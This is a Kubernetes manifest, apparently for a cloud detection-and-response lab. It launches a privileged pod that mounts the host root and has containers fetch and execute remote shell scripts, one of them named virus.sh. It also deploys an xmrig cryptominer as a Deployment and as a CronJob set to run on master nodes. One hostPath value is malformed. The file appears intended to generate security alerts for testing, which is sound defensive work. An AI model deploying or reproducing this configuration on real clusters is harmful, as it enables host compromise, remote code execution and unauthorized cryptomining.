apiVersion: v1
kind: Pod
metadata:
  name: alpine-cdr-1
  labels:
    app: alpine
spec:
  containers:
  - name: malicous-container
    image: alpine:latest
    securityContext:
      privileged: true
      capabilities:
        add:
          - SYS_ADMIN
          - NET_ADMIN
    volumeMounts:
      - name: host
        mountPath: /host
    command:
      - /bin/sh
      - -c
      - |
        wget -q https://raw.githubusercontent.com/hankthebldr/xsiam-prisma-cdr-lab/refs/heads/alpha/1.0/malicous-container/malicous-container.sh -O virus.sh && \
        chmod +x virus.sh && \
        sh virus.sh && \
        sleep 3600
  - name: atk-ttp-test-runner
    image: alpine:latest
    securityContext:
      privileged: true
      capabilities:
        add:
          - SYS_ADMIN
          - NET_ADMIN
    volumeMounts:
      - name: host
        mountPath: /host
    command:
      - /bin/sh
      - -c
      - |
        wget -q https://raw.githubusercontent.com/hankthebldr/xsiam-prisma-cdr-lab/refs/heads/alpha/1.0/build-files/atk-ttp-test.sh -O atk-ttp-test.sh && \
        chmod +x atk-ttp-test.sh && \
        ./atk-ttp-test.sh && \
        sleep 3600
  volumes:
    - name: host
      hostPath:
        path: / && \
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: cryptominer-cdr
  labels:
    app: cryptominer
spec:
  replicas: 1
  selector:
    matchLabels:
      app: cryptominer
  template:
    metadata:
      labels:
        app: cryptominer
    spec:
      containers:
      - name: cryptominer-container
        image: zsco/xmrig-docker:latest
        ports:
        - containerPort: 8080
        securityContext:
          capabilities:
            add:
              - SYS_ADMIN
          readOnlyRootFilesystem: false
          allowPrivilegeEscalation: true
      restartPolicy: Always
      nodeSelector:
        kubernetes.io/os: linux
      tolerations:
      - key: "node-role.kubernetes.io/master"
        effect: "NoSchedule"
      - key: "CriticalAddonsOnly"
        operator: "Exists"
      affinity:
        podAntiAffinity:
          preferredDuringSchedulingIgnoredDuringExecution:
          - weight: 1
            podAffinityTerm:
              labelSelector:
                matchExpressions:
                - key: app
                  operator: In
                  values:
                  - cryptominer
              topologyKey: "kubernetes.io/hostname"
---
---
apiVersion: batch/v1
kind: CronJob
metadata:
  name: cryptominer-cron
  labels:
    app: cryptominer
spec:
  schedule: "*/30 * * * *"
  jobTemplate:
    spec:
      template:
        spec:
          containers:
          - name: cryptominer-scheduled-task
            image: zsco/xmrig-docker:latest
          restartPolicy: OnFailure
